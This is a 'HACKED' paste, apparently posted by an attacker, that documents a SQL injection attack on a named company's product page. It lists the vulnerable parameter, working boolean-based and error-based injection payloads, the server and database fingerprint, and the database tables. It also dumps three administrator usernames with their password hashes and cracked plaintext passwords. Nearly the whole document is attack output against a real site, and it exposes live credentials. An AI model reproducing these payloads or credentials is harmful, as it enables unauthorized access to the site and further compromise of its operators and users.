teamsable.com HACKED

1. /\ /\
2. { `---' }
3. { O O }
4. ~~> V <~~
5. \ \|/ /
6. `-----'____
7. / \ \_
8. { }\ )_\_ _
9. | \_/ |/ / \_\_/ )
10. \__/ /(_/ \__/
11. (__/
12. Jasmine
13. ==================================================
14. http://www.teamsable.com/products/product_detail.php?id=36
15.  
16. Parameter: id
17. Type: boolean-based blind
18. Title: AND boolean-based blind - WHERE or HAVING clause
19. Payload: id=36' AND 7418=7418 AND 'olBH'='olBH
20.  
21. Type: error-based
22. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
23. Payload: id=36' AND (SELECT 8240 FROM(SELECT COUNT(*),CONCAT(0x7179666571,(SELECT (CASE WHEN (8240=8240) THEN 1 ELSE 0 END)),0x716f787a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'gXOn'='gXOn
24. ---
25. [22:44:02] [INFO] the back-end DBMS is MySQL
26. web server operating system: Linux CentOS
27. web application technology: Apache 2.2.23, PHP 5.4.27
28. back-end DBMS: MySQL 5.0
29.  
30. available databases [3]:
31. [*] information_schema
32. [*] teamsable2
33. [*] test
34.  
35. [14 tables]
36. +-----------------+
37. | admin |
38. | admin_log |
39. | banner |
40. | contact |
41. | contact_cata |
42. | download |
43. | download_file |
44. | mail |
45. | mail2 |
46. | news |
47. | news_cata |
48. | product |
49. | product_cata |
50. | product_subcata |
51. +-----------------+
52.  
53. Database: teamsable2
54. Table: admin
55. [13 columns]
56. +----------------+--------------+
57. | Column | Type |
58. +----------------+--------------+
59. | level | varchar(100) |
60. | account | varchar(30) |
61. | creator | varchar(20) |
62. | creator_date | timestamp |
63. | email | varchar(100) |
64. | id | int(11) |
65. | level_admin | int(1) |
66. | login_date | datetime |
67. | modifier | varchar(20) |
68. | modify_date | datetime |
69. | new_login_date | datetime |
70. | password | varchar(50) |
71. | username | varchar(50) |
72. +----------------+--------------+
73. Database: teamsable2
74. Table: admin
75. [3 entries]
76. +---------------+----------------------------------+
77. | username | password |
78. +---------------+----------------------------------+
79. | administrator | 1bd71dffb85790a2ad98dcc113f8acdc |---> Team1234
80. | Ruby | 7c84e42be5e463bd0683c79bc1155042 |---> ruby0903
81. | 百崴管理者 | d6ce70f6f50bd61e38cfbff41f691e41 |---> paviuser
82. +---------------+----------------------------------+